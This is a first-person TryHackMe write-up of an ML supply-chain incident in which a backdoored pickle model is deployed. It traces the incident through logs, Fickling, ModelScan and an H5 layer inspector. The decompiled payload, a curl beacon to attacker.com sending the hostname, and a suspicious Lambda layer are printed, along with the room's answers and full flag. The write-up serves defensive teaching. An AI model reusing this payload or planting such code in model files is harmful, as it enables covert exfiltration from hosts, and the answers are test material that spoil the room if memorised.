Payload (TryHackMe)

Introduction

The SOC alert arrived at 03:14. No deployments were scheduled. No changes were logged.

That single line sets the tone for one of the most quietly dangerous attack scenarios in modern AI infrastructure, a compromised ML model running silently in production for 21 days before anyone noticed. Not because the defences failed, but because nobody was looking at the model itself.

This write-up covers my investigation of Incident #2024-SC-0847 from TryHackMe's AI/ML Supply Chain Security room. The scenario: a code review model was swapped out for a malicious replacement sourced from an unverified Hugging Face organisation. The payload exfiltrated host identity data to an attacker-controlled server. What replacement did the engineering team stage to fix the problem? Also compromised.

What makes this attack class interesting from a security research perspective is where it lives — not in the application layer, not in the network, but in the model artifact itself. The tools that catch it are not your standard Web2 or Web3 security stack. They are Fickling, ModelScan, and H5 inspection tooling built specifically for the AI/ML supply chain. If you have never heard of them, that is exactly the problem this room is designed to highlight.

The Incident

The SOC alert arrived at 03:14. No deployments were scheduled. No changes were logged. The ML inference server had been making outbound HTTPS connections to an unrecognised address, and they were blocked only when the automated detection rule triggered.

You have been called in. The incident materials are waiting at /opt/supply-chain/incident/. Every tool you need is already installed.

The incident directory contains four things: deployment and network logs in logs/, the production model currently running in models/, a candidate replacement the engineering team staged but has not yet deployed, and a clean baseline for comparison.

Start with the logs to establish the timeline. Then, examine the production model, and finally assess the candidate replacement before the engineering team deploys it.

Note: All tools from the previous rooms are available: pickletools, fickling, modelscan, sha256sum, inspect_h5_model.py.

Answer the questions below

Read the deployment log at /opt/supply-chain/incident/logs/deployment.log. The replacement model came from a different organisation than the original. What is the name of that organisation? trustworthy-ai-lab

cat /opt/supply-chain/incident/logs/deployment.log
[2024-01-05 09:15:22] INFO  Model registry: pulling code-review-bert v1.0.0
[2024-01-05 09:15:23] INFO  Source: huggingface.co/verified-ml-team/code-review-bert
[2024-01-05 09:15:25] INFO  Loaded model: original_model.pkl (sha256: 793bb2f5bfdf4a1c...)
[2024-01-05 09:15:26] INFO  Model deployed to production inference server
[2024-01-26 14:32:10] INFO  Model update requested by ml-engineer@trytrainme.com
[2024-01-26 14:32:12] INFO  Source: huggingface.co/trustworthy-ai-lab/code-review-bert-v2
[2024-01-26 14:32:14] WARN  New source organisation detected: trustworthy-ai-lab
[2024-01-26 14:32:15] INFO  Loaded model: production_model.pkl
[2024-01-26 14:32:16] INFO  Model deployed to production inference server
[2024-02-16 03:14:00] ALERT SOC automated alert: unusual outbound HTTPS traffic detected
[2024-02-16 03:14:01] ALERT Destination: attacker.com:443
[2024-02-16 03:14:33] INFO  Incident #2024-SC-0847 created - investigation required

How many days passed between the replacement model being deployed and the SOC alert firing? 21

Based on the logs above from the day the model update occurred to the day SOC was alerted

Decompile the production model. What Python function does the payload use to execute the shell command? system

 fickling --check-safety /opt/supply-chain/incident/models/production_model.pkl
analyst@tryhackme-2204:~$ fickling --print-results /opt/supply-chain/incident/models/production_model.pkl
from os import system
_var0 = system('curl "http://attacker.com/beacon" -d "host=$(hostname)"')
result0 = _var0

What shell command does the payload use to capture the host's identity? hostname

analyst@tryhackme-2204:~$ fickling --json-output /tmp/out.json /opt/supply-chain/incident/models/production_model.pkl && cat /tmp/out.json
from os import system
_var0 = system('curl "http://attacker.com/beacon" -d "host=$(hostname)"')
result0 = _var0
cat: /tmp/out.json: No such file or directory

The beacon capture log shows the HTTP method used in the outbound request. What is it? POST

 cat /opt/supply-chain/incident/logs/beacon_capture.log
[2024-02-16 03:13:47] SESSION beacon-4821 ESTABLISHED  src=10.0.1.50  dst=attacker.com:443
[2024-02-16 03:13:47] REQUEST POST /beacon HTTP/1.1
[2024-02-16 03:13:47] HOST attacker.com
[2024-02-16 03:13:47] PAYLOAD host=ml-server-prod-01&id=THM{b4ckd00r_1n_
[2024-02-16 03:13:48] SESSION beacon-4821 BLOCKED  bytes_captured=51  reason=SOC_RULE_4821

The engineering team staged candidate_model.h5 as a replacement but have not yet deployed it. Run inspect_h5_model.py against it. What is the name of the suspicious layer it contains? manipulate_output

 python3 /opt/supply-chain/tools/inspect_h5_model.py /opt/supply-chain/incident/models/candidate_model.h5

=== Architecture Inspection: candidate_model.h5 ===

  Total layers: 5

  [OK]      InputLayer           input_layer_2
  [OK]      Flatten              flatten_2
  [OK]      Dense                dense_4
  [OK]      Dense                dense_5
  [WARNING] Lambda               manipulate_output (function: manipulate_output)
            exfil_suffix: pl41n_s1ght}

  RESULT: 1 layer(s) require review
    - Lambda (manipulate_output): Can contain arbitrary Python code that executes at inference time

The attacker split the campaign ID across two artefacts to avoid full exposure in any single capture. Examine beacon_capture.log and the candidate model to recover the complete flag. THM{b4ckd00r_1n_pl41n_s1ght}

01&id=THM{b4ckd00r_1n_

            exfil_suffix: pl41n_s1ght}

Conclusion

The flag was hiding in plain sight THM{b4ckd00r_1n_pl41n_s1ght} split across two artefacts specifically so no single capture would expose it. Half in the beacon payload, half embedded in the Lambda layer of the staged replacement model. The attacker had compromised not just the production model but the recovery path too.

Three things stood out from this investigation that I think matter beyond the CTF context:

First, the 21-day dwell time. The malicious model was in production from January 26 to February 16 before the SOC rule triggered. It was not a zero-day. It was not an advanced persistent threat. It was a pickle file with four lines of Python that nobody checked before deploying. The attack surface was the trust placed in the Hugging Face organisation name.
Second, the scanning format is not enough. ModelScan flagged the Lambda layer candidate_model.h5 as MEDIUM suspicious but not definitive. It took inspect_h5_model.py to read the architecture and name the layer manipulate_output. Static analysis of the serialisation format and static analysis of the model architecture are two different floors of the same building. Both are required.
Third, the replacement was also poisoned. This is the detail that changes how you think about incident response for AI systems. In a traditional compromise, you isolate, patch, and redeploy. Here, the attacker had already positioned a backdoored replacement in the staging pipeline. Verifying the recovery artifact is not optional; it is part of the investigation.

The tooling to catch all of this exists: Fickling for pickle decompilation, ModelScan for multi-format artifact scanning, H5 inspection for Keras architecture review, and SHA256 checksums for provenance verification. What is missing in most organisations is the process that makes running these tools mandatory before any model reaches production.

That is the gap AI security research is trying to close right now, and why I think this is one of the more important rooms on TryHackMe for anyone working at the intersection of security and ML systems.